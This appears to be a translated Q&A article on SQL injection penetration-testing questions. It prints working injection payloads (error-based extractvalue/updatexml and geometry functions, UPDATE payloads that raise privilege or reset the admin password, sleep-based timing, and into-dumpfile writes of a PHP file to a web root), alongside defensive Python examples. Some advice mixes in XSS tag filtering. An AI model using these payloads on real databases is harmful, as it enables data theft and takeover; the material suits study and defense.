What are the SQL injection penetration testing and network defense test questions?

2025-01-16 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

This article mainly introduces the SQL injection penetration testing and network defense test questions. The editor walks you through the operations with real cases; the method is simple, fast and practical. I hope this article "What are the SQL injection penetration testing and network defense test questions" helps you solve your problem.

What causes SQL injection vulnerabilities, what are the types and submission methods of injection, and how is it prevented?

Submit a statement that should cause an error and check whether the response is abnormal. Besides displayed errors, injection can also be detected by a sleep statement that holds the response for 5 seconds, by observing the return value through DNSlog, and so on.

Select * from news where id ='$SQL'

When the program performs operations such as fetching news, the submitted value is spliced into the SQL statement. If illegal data is submitted in that call, the database reports an error. In other words, the harm comes from input being concatenated into the statement and executed as part of it.

There are 6 types of injection (see SQLMAP): error-based, blind (boolean), UNION-based, time-based, inline queries, and stacked queries.

Injection submission methods: GET, POST, Cookies, HTTP request headers.

Prevention, layer by layer: network perimeter -> CDN (content delivery network) -> script-level filtering -> database filtering and least privilege -> hosts.

What is blind injection? How is it performed?

Blind injection means that during a SQL injection attack the server has turned off error echoing, so whether SQL injection exists and is exploitable can only be judged from changes in the content the server returns.

There are two kinds of blind injection.

Boolean-based: verify whether an injection point exists by checking whether the injected condition makes the returned content differ between true and false.

Time-based: judged by the difference in processing time of the SQL statement, using delay functions such as benchmark and sleep, or by constructing a join with a large "Cartesian" product to produce the delay.

Principle of wide byte injection

1. Principle

The database uses a wide character set, but the WEB layer does not take this into account. At the WEB layer 0xBF27 is two characters, so when addslashes or magic_quotes_gpc is enabled in PHP, 0xBF27 becomes 0xBF5C27, because the single quote in 0xBF27 is escaped. When the data enters the database, 0xBF5C is parsed as one wide character, so the escape backslash is "eaten" by the preceding 0xBF, and the single quote is freed to close the statement.

2. Root cause

character_set_client (the character set of the client) differs from character_set_connection (the character set of the connection layer), or conversion functions such as iconv and mb_convert_encoding are used improperly.

3. Solution

Unify the character sets of the database, Web layer, and operating system to avoid parsing differences, preferably UTF-8. Or escape data correctly, for example mysql_real_escape_string together with mysql_set_charset.
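The 0xBF27 -> 0xBF5C27 case above, reproduced byte by byte as an added example (not code from the article): a charset-unaware byte-level escape followed by GBK decoding leaves a bare quote, while decoding with the connection's declared charset before escaping does not. All function names here are this example's own.

```python
# Added example, not code from the article: models the wide-byte case and the
# "escape after decoding with the right charset" fix. Names are this example's own.

def addslashes_bytes(data: bytes) -> bytes:
    """Byte-level escaping like PHP's addslashes/magic_quotes_gpc: a backslash
    (0x5C) is inserted before every quote or backslash byte, charset unaware."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):  # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def has_unescaped_quote(text: str) -> bool:
    """True if a single quote appears that is not preceded by a backslash,
    i.e. one that would terminate an SQL string literal."""
    escaped = False
    for ch in text:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False

def vulnerable_path(raw: bytes) -> str:
    """Web layer escapes raw bytes, then the GBK-configured connection decodes
    them: 0xBF 0x5C pairs into one wide character and the backslash is eaten."""
    return addslashes_bytes(raw).decode("gbk", errors="replace")

def hardened_path(raw: bytes, charset: str = "utf-8") -> str:
    """Decode with the charset the connection is actually set to (UTF-8, as the
    article recommends) before escaping, so the backslash stays its own character."""
    text = raw.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'")

# Constructed sample input: lead byte 0xBF followed by a single quote (0x27).
WIDE_BYTE_INPUT = b"\xbf\x27"

if __name__ == "__main__":
    v, h = vulnerable_path(WIDE_BYTE_INPUT), hardened_path(WIDE_BYTE_INPUT)
    print("vulnerable:", repr(v), "bare quote:", has_unescaped_quote(v))
    print("hardened:  ", repr(h), "bare quote:", has_unescaped_quote(h))
```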

How is an UPDATE statement exploited in SQL injection?

Understand this SQL statement first.

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

If the values are modified into the following forms, injection is achieved.

1. Change the homepage value to http://xxx.net', userlevel='3

Then the SQL statement becomes

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel is the user's privilege level.

2. Change the password value to mypass)' WHERE username='admin'#

Then the SQL statement becomes

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

3. Change the id value to ' OR username='admin', and the SQL statement becomes

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

Why do parameterized queries prevent SQL injection?

Principle:

With parameterized queries the database server does not treat the contents of the parameters as part of the SQL instruction; it only applies the parameter values after it has finished compiling the SQL instruction.

To put it simply: parameterization prevents injection because the statement is the statement and the parameter is the parameter. The parameter's value is not part of the statement, and the database only executes according to the semantics of the statement.
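The UPDATE case above and the parameterization principle, shown side by side as an added example (not code from the article): the same handler written with string formatting and with bound parameters, run against an in-memory SQLite table constructed here, so the first case's homepage value changes userlevel in one and is stored as plain text in the other. Table layout and sample row are this example's own.

```python
import sqlite3

# Added example, not code from the article: the article's UPDATE handler with
# string formatting versus bound parameters. Table and row are constructed here.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id TEXT, username TEXT, password TEXT, "
                 "homepage TEXT, userlevel TEXT)")
    conn.execute("INSERT INTO user VALUES ('1', 'bob', 'old', 'http://bob.example', '1')")
    conn.commit()
    return conn

def update_profile_concat(conn, user_id: str, password: str, homepage: str) -> None:
    """Vulnerable: values are pasted into the statement text, so a quote in
    homepage ends the literal and the rest is parsed as SQL."""
    sql = (f"UPDATE user SET password='{password}', homepage='{homepage}' "
           f"WHERE id='{user_id}'")
    conn.execute(sql)
    conn.commit()

def update_profile_param(conn, user_id: str, password: str, homepage: str) -> None:
    """Hardened: the statement is compiled with placeholders first; the values
    are bound afterwards and cannot change the statement's structure."""
    conn.execute("UPDATE user SET password=?, homepage=? WHERE id=?",
                 (password, homepage, user_id))
    conn.commit()

def row_of(conn, user_id: str) -> tuple:
    """Returns (homepage, userlevel) stored for the given id."""
    return conn.execute("SELECT homepage, userlevel FROM user WHERE id=?",
                        (user_id,)).fetchone()

# Constructed sample: the homepage value from the article's first case.
HOMEPAGE_PAYLOAD = "http://xxx.net', userlevel='3"

def compare() -> dict:
    """Runs both handlers on fresh tables and reports what ended up stored."""
    results = {}
    for name, handler in (("concat", update_profile_concat),
                          ("param", update_profile_param)):
        conn = make_db()
        handler(conn, "1", "mypass", HOMEPAGE_PAYLOAD)
        results[name] = row_of(conn, "1")
        conn.close()
    return results

if __name__ == "__main__":
    for name, (homepage, level) in compare().items():
        print(f"{name}: homepage={homepage!r} userlevel={level!r}")
```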

What are the functions used for error-based injection?

extractvalue(): and extractvalue(1, concat(0x7e, (select @@version), 0x7e))

updatexml(): and updatexml(1, concat(0x7e, (select @@version), 0x7e), 1)

geometrycollection(): select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));

multipoint(): select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));

polygon(): select * from test where id=1 and polygon((select * from (select * from (select user()) a) b));

multipolygon(): select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));

linestring(): select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));

multilinestring(): select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));

exp(): select * from test where id=1 and exp(~(select * from (select user()) a));

How is delayed (time-based) injection judged?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

What do blind injection and delayed injection have in common?

Both are character-by-character judgments.

What SQL injection functions can write files?

select ... into outfile 'path'

select ... into dumpfile 'path'

select '' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

How to protect against SQL injection attacks?

1. Filter illegal symbols in the code, and filter or replace tags such as script, img, and frame.

2. Force the type of some variables directly; for example, limit the amount parameter to positive integer values, and limit other parameters such as names to Chinese and English characters only, and so on.

3. For statements that go into database queries and updates, make sure the data parameters coming from GET or POST have their parameter types locked down directly, to prevent malicious statements from being injected.

This is the end of the content on "What are the SQL injection penetration testing and network defense test questions". Thank you for reading. If you want to learn more about the industry, you can follow the industry information channel; the editor will update different knowledge points for you every day.
